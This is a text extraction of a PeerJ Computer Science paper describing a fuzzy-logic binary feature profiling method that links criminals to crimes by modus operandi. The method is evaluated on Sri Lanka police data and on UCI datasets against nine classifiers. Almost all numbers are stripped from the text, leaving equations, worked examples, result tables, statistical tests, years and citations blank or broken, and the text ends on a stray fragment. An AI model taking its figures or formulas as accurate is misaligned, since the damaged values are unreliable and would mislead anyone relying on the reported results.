the median of d is then divided by the number of instances (rows) in the matrix as the frt, which is . / = . for the above case. therefore, frt will range from to . this value provides an insight to a fair threshold value for the apriori method to generate the dynamic modus operandi with the most frequent elements. frt is used as the frequency threshold in finding the lengthiest mo with a probability of . because this value suggests that there is a moderate possibility of one feature having . probability in each of mo. this results in a dynamic modus operandi (dmo) as shown in eq. ( ), because the only transaction of crime attributes which provides a support of . is σ(a,f,g,i) as shown in eq. ( ). s= σ(a,f,g,i) |t| = = . ( ) dmo=[ ]. ( ) generating the complete mo profile (cmop) of the criminals the complete mo profile (cmop) is obtained by the or operation between the bits of each column of the feature matrix of the corresponding criminal. cmop guarantees the provision of a composite crime flow by considering all of the previous crime flow entities of a particular criminal. for example, the complete profile for the feature matrix shown in table is obtained as shown in table . therefore, cmop=[ ]. cmop contains s for each place for which a particular crime flow entity has taken place at least once. chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table or operation on the columns to obtain the complete mo profile. finding the deviation probability (dp) of cmop from the crime mo under consideration (umo) first, the deviation of cmop and umo is obtained according to eq. ( ). as the binary feature vectors are commonly used to represent patterns, many methods have been invented to find their similarity and distance (cha, tappert & choi, ). euclidean distance, hamming distance, manhattan distance, jaccard, sorensen and tanimoto are few of the frequently used measures in that domain (cha, tappert & choi, ). this probability value, which is named as the deviation probability (dp), is used to obtain a measurement as to what extent of information is available in the umo, extra to what is already available in the cmop of a particular criminal. let’s assume that the bit pattern to be compared with the suspect’s modus operandi profile under consideration is umo = [ ]. therefore, dp provides the probability of s which are available in umo but not in cmop. the deviation probability, dp can be given as, dp= ∑n i= xi−yi n , for xi= ,yi= ;i= , ,...,n ( ) where, xi=elements of the umo yi=elements of the cmop. if we consider the feature matrix on table , deviation=[ ]−[ ] deviation=[ − − − ]. ( ) define ad= , where ad is the number of positive s. therefore, dp= / = . . as it appears in expression , it produces positive s for the places with the features available in umo but not in cmop. the higher the dp, higher the amount of extra information available in umo. hence, a dp value close to indicates the absence of extra features in umo. finding the completeness probability (cp) of umo against dmo for the same feature matrix which was considered in table , the cp is obtained according to ( ). here, the umo is compared with dmo to obtain a probability to determine what chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure block diagram of the proposed fuzzy inference system. extent of features in cp is available in umo. 
therefore, it is derived by the percentage of attributes which are present in both umo and dmo. let dmo={xi}ni= and umo= { yj }n j= be two binary sequences. define, zk = { ; xi=yj ; otherwise then, cp= ∑n k= zk n is the completeness probability. ( ) for example, if we consider dmo=[ ], then for the umo= [ ] a cp of / = . is generated as in the st, th and th positions there are ones in both dmo and umo. the higher the cp value, the more the umo is composed of crime flow entities which are available in the dmo. therefore, a cp value close to indicates that the completeness of umo compared to dmo is %. building a fuzzy inference system to obtain the final similarity score the vagueness of the two measurements cp and dp generates a difficulty in calculating a similarity score using crisp logic. therefore, the two parameters cp and dp were adapted into a fuzzy inference system which accepts two inputs and provides a score for the similarity between a suspect and a crime. figure shows a block diagram of the proposed fuzzy inference system. mamdani fuzzy inference was used as an attempt to solve a control problem by a set of linguistic rules obtained from experienced human operators (mamdani & assilina, ). first, the rule base of the fuzzy controller was defined by observing the variations of cp and dp. the membership functions of the inputs and outputs were then adjusted in such a way that the parameters which seem to be wrong can be fine-tuned, which is a common practice in defining fuzzy inference systems (godjevac, ). literature shows many methods used in fine tuning the fuzzy parameters. usage of adaptive networks (sun, ) and neuro-fuzzy systems (abraham, nath & mahanti, ) in fine tuning the fuzzy parameters have received more attention. the problem at our hand was to generate a fuzzy inference system which generates the highest similarity score when the dp value goes down and cp value goes up. we conducted a manual mapping procedure for the fuzzy membership functions. therefore, the input and output space of the two inputs cp and dp and the output were partitioned into subsets. namely, chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure input fuzzy variable : cp. low, moderate and high. center of gravity was used as the defuzzification strategy of the fuzzy controller. mamdani fuzzy inference was especially selected for the similarity score generation procedure, for the highly intuitive knowledge base it offers due to the fact that both antecedents and the consequents of the rules are expressed as linguistic constraints (zadeh, ). first, we selected all of these membership functions with % overlap. then the tuning procedure was conducted during which we adjusted either the left and/or right spread and/or overlapping to get the best possible similarity score for the given dp and cp. this procedure was conducted until the fis generated satisfactory results. figures and show the fuzzy inputs of the fuzzy inference system (fis) which correspond to cp and dp values respectively. figure depicts the fuzzy output of the fis. as the figs. – depict, all the different levels of membership functions under each input and the output are selected to be triangular and trapezoidal functions as triangular or trapezoidal shapes are simple to implement and computationally efficient (mathworks inc, – ). as shown in fig. , the universe of discourse of similarity score (fuzzy output) ranges from to . 
the defuzzified score which is generated from the fis is considered as the measurement for how close the modus operandi under consideration is to a particular suspect’s profile. a higher score value close to provides a good indication about a high similarity between the modus operandi of the crime and suspect under consideration. the fuzzy rule derivation of the fuzzy controller is heuristic in nature. according to the calculations of the two inputs, higher values of cp, close to and lower values of dp close to , positively affect the final similarity score. the rule base of the fuzzy model is generated accordingly. the rule base provides a non-sparse rule composition of combinations as illustrated in fig. . the rule surface of the fuzzy controller depicted in fig. , shows the variation of the similarity score with the changes of the two inputs cp and dp. according to the figure it’s perfectly visible, for higher values of cp (close to ) and for lower values of dp (close to ), the fuzzy controller generates higher values for the similarity score which are close to . chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure input fuzzy variable : dp. figure output fuzzy variable: similarity score. figure fuzzy rule set of the rule base of the inference system. chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure rule surface of the fuzzy controller. classification of the umo under the class with the highest similarity score when the algorithm is used to find associations between modi operandi of criminals and modi operandi of crimes, the similarity score which is generated from the newly proposed method can be used directly. a similarity score which is close to would suggest that the criminal has a very high tendency to have committed the crime which is under investigation. therefore, the similarity scores can be used to classify a particular modus operandi to a most probable suspect with the highest similarity score. the proposed method was developed by using matlab . . (r a) (mathworks, – a). all the necessary implementations were conducted using the matlab script editor (mathworks, – b) apart from the fis which was implemented using the matlab fuzzy toolbox (mathworks, – c). the nine classification algorithms which were used for the performance comparison were classification algorithms which are already packaged with the weka . . tool (hall et al., ). results and discussion the method was tested with a crime data set obtained from sri lanka police. figure shows the crime frequencies in sri lanka by the crime types from to . it shows only crime types because the five new crime types were introduced in . th column denoting house breaking and theft shows the highest number of occurrences. : theft of property, : robbery, : cheating/misappropriation, : hurt by knife, : homicide, : rape/incest, : grievous hurt, : mischief over rs. , /=, : abduction/kidnapping comes next. for the validation of the algorithm, crime types out of these types were selected for the testing data set. they are, house breaking and theft, theft of property, robbery, homicide, rape/incest, grievous hurt, abduction/kidnapping. a total of crime flows were selected which are common to the seven selected crime types. the data set is also composed of eight sub types and two special categories. altogether the data set consisted of instances in which each instance is composed of attribute values. 
the data set is distributed over a number of classes (criminals).

figure: frequency of different crime types by year.
figure: distribution of modus operandi instances over the classes of the dataset.

all the tests were performed on a windows computer with an intel core cpu. the histogram of the instance distribution over the classes is shown in the figure above. a 10-fold cross validation (refaeilzadeh, tang & liu, ) was used on the data set for a fair testing procedure. in 10-fold cross validation, the data set is divided into 10 subsets, and the holdout method is repeated 10 times: each time, one of the subsets is used as the test set and the other nine subsets are put together to form a training set; the average error across all trials is then computed (refaeilzadeh, tang & liu, ). the test results of the modus operandi classifications, in terms of area under the curve (auc) (hanley & mcneil, ) and the time elapsed for the classification, are shown in the results table. a receiver operating characteristic (roc) curve is a two-dimensional graphical illustration of the trade-off between the true positive rate (sensitivity) and the false positive rate (1 − specificity).
oversampling and under-sampling are two different categories of resampling approaches, where in oversampling the small classes are incorporated with repeated instances to make them reach a size close to lager classes, whereas in under-sampling, the number of instances is deceased in such a way that the number of instances reach a size close to the smaller classes (estabrooks, jo & japkowicz, ). chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure roc curves returned by the newly proposed method on the classes of crime data set. table shows the results returned by the fuzzy based binary feature profiling which was conducted on the actual crime data set. as shown in the table, there is an increase in the accuracy when the input data set undergoes oversampling. since the maximum number of instances available under one suspect is equal to , under-sampling does not provide a good accuracy. the results prove that the new algorithm works well for a balanced data set as the new method showed an increase in performance when the data set is subjected to an oversampling greater than or equal to . figure shows the change inx auc with the increase of sampling which starts from under-sampling of and goes on to an over sampling of . according to the plot it can be observed that the auc values are increased when the oversampling is increased. the execution time of the algorithm was . s when there is no oversampling or under-sampling. the maximum execution time is . when there is an oversampling of . according to the plot shown in fig. , it is clear that there is an increase of execution time as the oversampling size increases. but, the overall execution time is always remained under ms. overview of the classification algorithms used for the comparison it is a known fact that there is no single algorithm which can be categorized as the best to solve any problem. different classification algorithms may perform differently in different situations (wolpert, ). therefore, the newly proposed method was tested against ten other open classification data sets (the information about these data sets is provided in chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure change of auc values with oversampling. figure change of time elapsed for the data sets. table ) and the performance was evaluated against the results obtained from nine other well-known classification techniques, thereby assessing the quality of the newly proposed method. the nine other classification algorithms include, logistic regression, j decision tree, radial basis function network (rbfnetwork), multi-layer perceptron (mlp), naive bayes classifier, sequential minimal optimization (smo) algorithm, kstar instance based classifier, best-first decision tree (bftree) classifier, and logistic model tree (lmt) classifier. these classifiers represent four classes of classification algorithms. namely, function based classifiers, tree based classifiers, bayesian classifiers and lazy classifiers. logistic regression learns conditional probability distribution. relating qualitative variables to other variables through a logistic cumulative distribution functional form is logistic regression (chang & lin, ). j is an open source java implementation of the c . decision tree algorithm (machine learning group at the university of waikato). 
a decision tree consists of internal nodes that specify tests on individual input variables chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table description of the classification data sets for performance comparison. data set description number of instances no of attributes dermatology data set (ilter & guvenir, ) this database has been created on a dermatology test carried out on skin samples which have been taken for the evaluation of histopathological features. the val- ues of the histopathological features have been determined by an analysis of the samples under a microscope. in the dataset constructed for this domain, the family history feature has the value if any of these diseases has been observed in the fam- ily, and otherwise. every other feature (clinical and histopathological) was given a degree in the range of to . here, indicates that the feature was not present, indicates the largest amount possible, and , indicate the relative intermediate values. balance scale data set (hume, ) this data set has been generated to model psychological experimental results. each example is classified as having the balance scale tip to the right, tip to the left, or be balanced. the attributes are the left weight, the left distance, the right weight, and the right distance. the correct way to find the class is the greater of (left-distance * left-weight) and (right-distance * right-weight). if they are equal, it is balanced. there are classes (l, b, r), five levels of left-weight ( , , , , ), five levels of left-distance ( , , , , ), five levels of right-weight ( , , , , ) and five levels of right-distance ( , , , , ). balloons data set (pazzani, a) this data set has been generated using an experiment of stretching a collection of balloons carried out on a group of adults and children (pazzani, b). in the data set, inflated is true if (color= yellow and size= small) or (age= adult and act= stretch). in the data set there are two main output classes, namely t if inflated and f if not inflated, two colors yellow and purple, two sizes, large and small, two act types, stretch and dip, and two age groups, adult and child. car evaluation data set (bohanec & zupan, a) car evaluation database has been derived from a simple hierarchical decision model originally developed for the demonstration of dex by bohanec & rajkovic ( ). the car evaluation database contains examples with information that is directly related to car. they are buying, maint, doors, persons, lug_boot and safety. the attribute buying is the buying price which is considered to have four levels v-high, high, med, low. maint is the price of the maintenance which contains the four levels, v-high, high, med, low. doors have the four levels , , , -more. person (capacity in terms of persons to carry), lug_boot (the size of luggage boot) and safety (estimated safety of the car) have levels each. , soybean data set (fisher, ; michalski, ) this is a small subset of the original soybean database. the data set is distributed over four classes, d , d , d and d . the categorical variables represent differ- ent levels of qualities of the soybean vegetable. 
these categorical variables include plant-stand, precip, temp, hail, crop-hist, area-damaged, severity, seed-tmt, germination, plant-growth, leaves, leafspots-halo, leafspots-marg, leafspot-size, leaf-shread, leaf-malf, leaf-mild, stem, lodging, stem-cankers, canker-lesion, fruiting-bodies, external, mycelium, int-discolor, sclerotia, fruit-pods, fruit, seed, mold-growth, seed-discolor, seed-size, shriveling and roots. the number of levels represented by each variable varies. lenses data set (julien): the lenses data set is a small database about fitting contact lenses. the data set is composed of five attributes including the class variable, and it has three classes. age of the patient, spectacle prescription, astigmatic and tear production rate are the attributes of the data set. each attribute contains at least two and at most three categories.
smo is an implementation of john platt’s sequential minimal optimization algorithm for training a support vector classifier. it globally replaces all missing values and transforms nominal attributes into binary one. it also normalizes all attributes by default (platt, ; keerthi et al., ). kstar (k*) is an instance-based classifier which uses an entropy–based distance function (cleary & leonard, ). bftree uses binary split for both nominal and numeric attributes (friedman, hastie & tibshirani, ). lmt is a classifier for building ‘logistic model trees’, which are classification trees with logistic regression functions at the leaves (landwehr, hall & frank, ; sumner, frank & hall, ). as the newly proposed method accepts only binary input variables, the data sets which are used for the analysis must be preprocessed into the acceptable format. for example, the ‘‘balance scale’’ data set is composed of four attributes. table shows the attributes and their information of the balance scale data set. therefore, the data set was adjusted as shown in fig. , prior to using it with the proposed method. each category of a particular attribute is represented by a dummy variable. for example, left-weight attribute results in five attributes in the preprocessed chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table attribute information of the balance data set. attribute number of categories categories class name l, b, r left-weight , , , , left-distance , , , , right-weight , , , , right-distance , , , , figure schematic diagram used for pre-processing of the balance dataset in such a way that it matches the format of inputs of the newly proposed method. data set and each attribute is represented using five binary variables as lw , lw , lw , lw and lw where the presence of the attribute denotes and otherwise. as depicted in fig. , if left-weight has a value of in an instance it results in for the corresponding derived attribute that is lw . therefore, if there is an instance where left-weight = , left-distance = , right-weight = and right-distance = , class name = b, it is represented as lw = , lw = , lw = , lw = , lw = , ld = , ld = , ld = , ld = , ld = , rw = , rw = , rw = , rw = , rw = , rd = , rd = , rd = , rd = , rd = , class name = b. the pre-processed data is then fed to the newly proposed algorithm and the nine other algorithms. performances were compared based on auc analysis of the roc curves, and the processing time for model generation. fold cross validation was used under each test for fair testing procedure. for the sake of simplicity, the newly proposed modes operandi analysis algorithm was acronymed as bfpm (binary feature profiling methodology). as all the data sets which were used for the tests are composed of multi classes, weighted average auc was used, where each target class is weighted according to its prevalence as given in eq. ( ). weighted average was used in order to prevent target classes with smaller instance counts from adversely affecting the results (hempstalk & frank, ). aucweighted = ∑ ∀ci∈c auc(ci)×p(ci) ( ) table shows the weighted average auc values obtained for each data set under each classification algorithm. chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table weighted average auc values obtained by the algorithms on classifying the data sets. 
bfpm logistic regression j radial basis function network multi-layer perceptron naive bayes classifier smo kstar bftree lmt dermatology data set . . . . . . . . . balance scale data set . . . . . . . . . . balloons data set car evaluation data set . . . . . . . . . soybean data set . . . lenses data set . . . . . . . . . . nursery data set . . . . . . . . . tic-tac-toe data set . . . . . . . . . . spect heart data set . . . . . . . . . . monk’s problems data set . . . . . . . . . . c ham ikara etal. ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table friedman’s mean rank values returned on the data available in table . method mean rank mlp . lmt . kstar . logisticregression . rbfnetworks . naivebayesclassifier . bfpm . bftree . j . smo . friedman’s rank test is a nonparametric test analogous to a standard one-way repeated- measures analysis of variance (howell, ). the friedman’s rank test results returned on the auc test data are shown in table . this test returns a test statistic (χ ) value (‘‘chi-square’’) of . , degree of freedom of and a p-value of . , proving that there is an overall statistically significant difference between the mean ranks of the classification algorithms. according to the table, the highest mean rank is returned for mlp while the lowest mean rank is returned for smo, proving that mlp provides the best performance while smo provides the least performance for the data sets tested. therefore, it indicates that the new model provides a better performance than bftree, j and smo algorithms for the data sets tested. the average processing times elapsed for each algorithm to classify the data sets are given in table . friedman’s rank test on the data of table returned the results shown in table in which the mean rank values prove better efficiency for the new method than j , logisticregression, smo, rbfnetworks, bftree, mlp and lmt. the test statistic (χ ) value (‘‘chi-square’’) of . , degree of freedom of and a p-value of . , proves that there is an overall statistically significant difference between the mean ranks of the classification algorithms. friedman’s rank test results for the two measurements, auc and time elapsed conclude that the newly proposed method provides acceptable results against the nine other well established classification algorithms. conclusion the studies of modus operandi help crime investigation by letting the police officers to solve crimes by linking suspects to crimes. though there are many descriptive studies available under modus operandi analysis, only a small amount of work is available under computer science. many of these methods have been derived using the methods based on link analysis. however, the accuracy of these methods is always compromised due to the cognitive biases of the criminals. a novel fuzzy based binary feature profiling method (bfpm) to find associations between crimes and criminals, using modus operandi is introduced. the newly proposed chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table average processing time for each algorithm on the classification of the ten data sets. bfpm logistic regression j radial basis function network multi-layer perceptron naive bayes classifier smo kstar bftree lmt dermatology data set . . . . . . . . . . balance scale data set . . . . . . . . balloons data set . . . . car evaluation data set . . . . . . . . . soybean data set . . . . . . . . lenses data set . . . . . . 
nursery data set . . . . . . . . . tic-tac-toe data set . . . . . . . . . spect heart data set . . . . . . . . monk’s problem data set . . . . . . . . c ham ikara etal. ( ),p eerj c om put.s ci.,d o i . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table mean rank values returned by the friedman’s rank test on the time values available in table . method mean rank kstar . naivebayesclassifier . bfpm . j . logisticregression . smo . rbfnetworks . bftree . mlp . lmt . method subjects not only the properties of the present, but also the properties of his/her previous convictions. the concept of dynamic modus operandi which is available in the proposed method considers the modi operandi of all of his/her previous convictions to provide a fair rectification to the errors which result due to the human cognition. dynamic mo uses frequent item set mining to result in a generalized binary feature vector. complete mo profile also encapsulates past modi operandi of a particular criminal by aggregating the modi operandi of all of his/her previous convictions to one binary feature vector. this feature also guarantees a usage of criminal’s past crime record with more generalizability. completeness probability measures how much information is available in the new crime which is not available in the complete mo profile. therefore, this measurement provides the capability of measuring how much extra amount of information is carried by the mo of the new crime. the deviation probability provides a notion about how much the new mo deviates from the most frequent crime flows which are available in the dynamic mo of a particular criminal. the vagueness and the impreciseness prompted the fact that it is not possible to use crisp logic to generate the similarity score. therefore, a fuzzy inference system was modeled to generate the similarity score. due to the under-represented and imbalanced properties of the actual data set, the new method has returned a lower performance when it was proposed to the data set without any rectification on the data set. however, with the introduction of over sampling, the method returned a very good performance, allowing one to arrive at the conclusion that the method could provide acceptable results for a balanced data set. the method generated favorable results in providing a good similarity measurement to suggest the connections between crimes and criminals. the fuzzy controller of the new approach guarantees to resemble the human reasoning process by confirming the usage of human operator knowledge to deal with nonlinearity of the actual situation. the newly proposed method was then adapted into a classification algorithm for the validation and comparison with other classification algorithms. the comparison of the new method with the well-established classification algorithms confirmed the generalizability of the new method. the method only provides the capability to process the categorical data sets. if there are any continuous variables in the data set, the values must be introduced with categories chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. before further processing. the method can be further extended to directly accept the continuous attributes. as the center of gravity method is used for the defuzzification process, further optimizations can be done by simplifying the defuzzification procedure. 
adapting the fuzzy inference engine to a sugeno (takagi & sugeno, ) type and converting the defuzzification method to a more computationally efficient method such as the weighted average (wu & mendel, ) method would provide a less complex computation. this would result in even less processing time when the sophistication of the data set rises. additional information and declarations funding this work was funded by the national research council (nrc) of sri lanka (grant number: - ). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: national research council (nrc): - . competing interests the authors declare there are no competing interests. author contributions • mahawaga arachchige pathum chamikara conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, performed the computation work. • akalanka galappaththi conceived and designed the experiments, contributed reagents/ materials/analysis tools. • roshan dharshana yapa and ruwan dharshana nawarathna conceived and designed the experiments, performed the experiments, performed the computation work, reviewed drafts of the paper. • saluka ranasinghe kodituwakku conceived and designed the experiments, contributed reagents/materials/analysis tools, reviewed drafts of the paper. • jagath gunatilake conceived and designed the experiments, reviewed drafts of the paper. • aththanapola arachchilage chathranee anumitha jayathilake conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/ materials/analysis tools, performed the computation work. • liwan liyanage conceived and designed the experiments, analyzed the data, contributed reagents/materials/analysis tools, reviewed drafts of the paper. data availability the following information was supplied regarding data availability: the data sets were taken from: https://archive.ics.uci.edu/ml/datasets.html. the individual links to separate data sets are provided inline with the text of the paper. chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://archive.ics.uci.edu/ml/datasets.html http://dx.doi.org/ . /peerj-cs. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abraham a, nath b, mahanti pk. . hybrid intelligent systems for stock market analysis. in: computational science-iccs. lecture notes in computer science, vol. . – . adamo jm. . data mining for association rules and sequential patterns, sequential and parallel algorithms. st edition. new york: springer science & business media. agrawal r, imielinkski j, swami a. . mining association rule between sets of items in large databases. in: proceedings of the acm sigmod international conference of management of data. new york: acm, – . aha dw. . uci machine learning repository. available at https://archive.ics.uci. edu/ml/datasets/tic-tac-toe+endgame. bennell c, canter dv. . linking commercial burglaries by modus operandi: tests using regression and roc analysis. science & justice ( ): – doi . /s - ( ) - . bennell c, jones nj. . between a roc and a hard place: a method for linking serial burglaries by modus operandi. 
journal of investigative psychology and offender profiling ( ): – doi . /jip. . berry mj, linoff g. . data mining techniques: for marketing, sales, and customer support. rd edition. hoboken: wiley. bishop cm. . neural networks for pattern recognition. oxford: oxford university press. bohanec m, rajkovic v. . expert system for decision making. sistemica ( ): – . bohanec m, zupan b. a. uci machine learning repository. available at https://archive.ics.uci.edu/ml/datasets/car+evaluation. bohanec m, zupan b. b. uci machine learning repository. available at https: //archive.ics.uci.edu/ml/datasets/nursery. borg a, boldt m, lavesson n, melander u, boeva v. . detecting serial residential burglaries using clustering. expert systems with applications ( ): – doi . /j.eswa. . . . canter d, hammond l, youngs d, juszczak p. . the efficacy of ideographic models for geograhical offender profiling. journal of quantitative criminology ( ): – doi . /s - - - . capozzoli a, lauro f, khan i. . fault detection analysis using data mining tech- niques for a cluster of smart office buildings. expert systems with applications ( ): – doi . /j.eswa. . . . cha ss, tappert sh, choi cc. . a survey of binary similarity and distance measures. journal of systemics, cybernetics and informatics ( ): – . chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information https://archive.ics.uci.edu/ml/datasets/tic-tac-toe+endgame https://archive.ics.uci.edu/ml/datasets/tic-tac-toe+endgame http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /jip. https://archive.ics.uci.edu/ml/datasets/car+evaluation https://archive.ics.uci.edu/ml/datasets/nursery https://archive.ics.uci.edu/ml/datasets/nursery http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /peerj-cs. chamikara map, galappaththi a, yapa yprd, nawarathna rd, kodituwakku sr, gunathilake j, liyanage lh. . a crime data analysis framework with geographical information support for intelligence led policing. peerj preprints :e doi . /peerj.preprints. v . chang yci, lin sc. . synergy of logistic regression and support vector machine in multiple-class classification. in: ideal . lecture notes in computer science, vol. , – . chen h. . machine learning for information retrieval: neural. journal of the ameri- can society for information science ( ): – doi . /(sici) - ( ) : < ::aid-asi > . .co; -s. chen h. . intelligence and security informatics for international security. st edition. vol. . berlin heidelberg: springer. chen h, chung w, xu jj, wang g, qin y, chau m. . crime data mining: a general framework and some examples. computer ( - ): – doi . /mc. . . chen h, zeng d, atabakhsh h, wyzga w, schroeder j. . coplink: managing law enforcement data and knowledge. communications of the acm ( ): – doi . / . . chikersal p, poria s, cambria e. . sentu: sentiment analysis of tweets by combin- ing a rulebased classifier with supervised learning. in: proceedings of the international workshop on semanti evaluation (semeval), – . chisum wj, turvey b. . evidence dynamics: locard’s exchange principle & crime reconstruction. journal of behavioral profiling ( ): – . cleary jg, leonard et. . k∗: an instance-based learner using an entropic distance measure. in: th international conference on machine learning, – . douglas je, douglas lk. . 
modus operandi and the signature aspects of violent crime. in: crime classification manual. nd edition. san francisco: jossey-bass, – . estabrooks a, jo t, japkowicz n. . a multiple resampling method for learning from imbalanced data sets. computational intelligence ( ): – doi . /j. - . .t - - .x. fisher d. . uci machine learning repository. available at https://archive.ics.uci.edu/ ml/datasets/soybean+% small% . friedman j, hastie t, tibshirani r. . additive logistic regression: a statistical view of boosting. annals of statistics ( ): – . godjevac j. . neuro-fuzzy controllers: design and application. st edition. lausanne: ppur presses polytechniques et universitaires romandes. hall m, frank e, holmes g, pfahringer b, reutemann p, witten ih. . the weka data mining software. acm sigkdd explorations newsletter ( ): doi . / . . hanley ja, mcneil bj. . the meaning and use of the area under a receiver operating characteristic (roc) curve. radiology ( ): – doi . /radiology. . . . chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj.preprints. v http://dx.doi.org/ . /(sici) - ( ) : < ::aid-asi > . .co; -s http://dx.doi.org/ . /mc. . http://dx.doi.org/ . /mc. . http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /j. - . .t - - .x http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://dx.doi.org/ . /radiology. . . http://dx.doi.org/ . /peerj-cs. hempstalk k, frank e. . discriminating against new classes: one-class versus multi- class classification. in: ai : advances in artificial intelligence: st australasian joint conference on artificial intelligence. auckland, – . holdaway s. . issues in sociology: crime and deviance. spiral-bound, new edition. cheltenham: nelson thornes ltd. howell dc. fundamental statistics for the behavioral sciences focuses. th edition. belmont: wadsworth, cengage learning. hume t. . uci machine learning repository. available at https://archive.ics.uci.edu/ ml/datasets/balance+scale. ilter n, guvenir ha. . uci machine learning repository. available at https://archive.ics.uci.edu/ml/datasets/dermatology. jayawardena aw, fernando dak, zhou mc. . comparison of multilayer pe- ceptron and radial basis function networks as tools for flood forecasting. iahs publications-series of proceedings and reports-international association of hydrological sciences : – . julien b. . uci machine learning repository. available at https://archive.ics.uci.edu/ ml/datasets/lenses. keerthi ss, shevade sk, bhattacharyya c, murthy krk. . improvements to platt’s smo algorithm for svm classifier design. neural computation ( ): – doi . / . king rd, sutton gm. . high times for hate crimes: explaining the temporal clustering of hate-motivated offending. criminology ( ): – doi . / - . . koperski k, han j. . discovery of spatial association rules in geographic informa- tion databases. in: proceeding of the th international symposium on spatial databases, – . kurgan la, cios kj. . uci machine learning repository. available at https://archive.ics.uci.edu/ml/datasets/spect+heart. landwehr n, hall m, frank e. . logistic model trees. machine learning ( – ): – doi . /s - - - . leclerc b, proulx j, beauregard e. . examining the modus operandi of sexual offenders against children and its practical implications. aggression and violent behavior ( ): – doi . /j.avb. . . . lin s, brown de. . an outlier-based data association method for linking criminal incidents. decision support systems ( ): – doi . /j.dss. . . . mamdani eh, assilina s. . 
an experiment in linguistic synthesis with a fuzzy logic controller. international journal of man-machine studies ( ): – doi . /s - ( ) - . mathworks. – a. mathworks. available at https://in.mathworks.com/ . mathworks. – b. mathworks documentation. available at http://in.mathworks.com/help/matlab/ref/edit.html. mathworks. – c. mathworks fuzzy logic toolbox. available at http://in.mathworks.com/help/matlab/ref/edit.html. chamikara et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://archive.ics.uci.edu/ml/datasets/balance+scale https://archive.ics.uci.edu/ml/datasets/balance+scale https://archive.ics.uci.edu/ml/datasets/dermatology https://archive.ics.uci.edu/ml/datasets/lenses https://archive.ics.uci.edu/ml/datasets/lenses http://dx.doi.org/ . / http://dx.doi.org/ . / http://dx.doi.org/ . / - . https://archive.ics.uci.edu/ml/datasets/spect+heart http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.avb. . . http://dx.doi.org/ . /j.dss. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /s - ( ) - https://in.mathworks.com/ http://in.mathworks.com/help/matlab/ref/edit.html http://in.mathworks.com/help/matlab/ref/edit.html http://dx.doi.org/ . /peerj-cs. mathworks inc. – . mathworks. available at http://in.mathworks.com/help/ fuzzy/foundations-of-fuzzy-logic.html. michalski rs. . learning by being told and learning from examples: an experimental comparison of the two methodes of knowledge acquisition in the context of developing an expert system for soybean desease diagnoiss. international journal of policy analysis and information systems ( ): – . mokros a, alison lj. . is offender profiling possible? testing the predicted homol- ogy of crime scene actions and background characteristics in a sample of rapists. legal and criminological psychology ( ): – doi . / . oatley g, ewwart b. . data mining and crime analysis. wiley interdisciplinary reviews: data mining and knowledge discovery ( ): – doi . /widm. . palmiotto mj. . crime pattern analysis: an investigative tool. critical issues in criminal investigation : – . paternoster r, bachman r. . explaining criminals and crime: essays in contemporary criminological theory. los angeles: roxbury publishing company. pazzani m. a. uci machine learning repository. available at https://archive.ics.uci.edu/ml/datasets/balloons. pazzani m. b. the influence of prior knowledge on concept acquisition: experimen- tal and computational results. journal of experimental psychology: learning, memory and cognition ( ): – . platt jc. . fast training of support vector machines using sequential minimal optimization. in: advances in kernel methods. cambridge: mit press, – . quinlan jr. . c . programs for machine learning. machine learning ( ): – . refaeilzadeh p, tang l, liu h. . cross-validation. in: encyclopedia of database systems. st edition. new york: springer us, – . rish i. . an empirical study of the naive bayes classifier. vol. . new york, – . sumner m, frank e, hall m. . speeding up logisti model tree induction. in: th european conference on principles and practice of knowledge discovery in databases, – . sun ct. . rule-base structure identification in an adaptive-network-based fuzzy in- ference system. ieee transactions on fuzzy systems ( ): – doi . / . . takagi t, sugeno m. . fuzzy identification of systems and its applications to modeling and control. ieee transactions on systems, man and cybernetics : – . the ‘lectric law library. 